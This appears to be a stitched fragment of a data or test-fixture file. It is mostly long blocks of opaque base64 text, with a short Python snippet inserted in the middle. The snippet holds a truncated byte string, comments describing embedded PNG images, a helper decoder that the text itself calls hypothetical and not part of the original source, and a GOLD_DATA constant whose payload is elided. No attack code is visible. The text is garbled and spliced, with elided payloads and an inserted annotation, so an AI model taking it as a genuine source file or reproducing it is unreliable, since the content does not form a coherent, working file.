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
...AAAAAASUVORK5CYII='  # tail of a base64-encoded PNG byte string; the bulk of the payload is elided
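# Note: the byte strings above and below embed base64-encoded PNG images; the
# "iVBORw0KGgo" prefix is the base64 encoding of the PNG signature
# b'\x89PNG\r\n\x1a\n'. Below is a minimal sketch of decoding such a fixture
# back to raw PNG bytes. The decode_png_fixture() helper is hypothetical and
# not part of the original source.
import base64

def decode_png_fixture(data: bytes) -> bytes:
    """Decode a base64-embedded PNG fixture and sanity-check its signature."""
    raw = base64.b64decode(data)
    # Fail fast if the embedded payload is not actually a PNG.
    assert raw.startswith(b'\x89PNG\r\n\x1a\n'), 'fixture is not a PNG'
    return raw

# Hypothetical usage: raw_png = decode_png_fixture(GOLD_DATA)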
GOLD_DATA = b'iVBORw0KGgoAAAANSUhEUgAAANkAAAGHCAYAAAA9TfdF...'  # base64-encoded PNG reference image; the bulk of the payload is elided
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
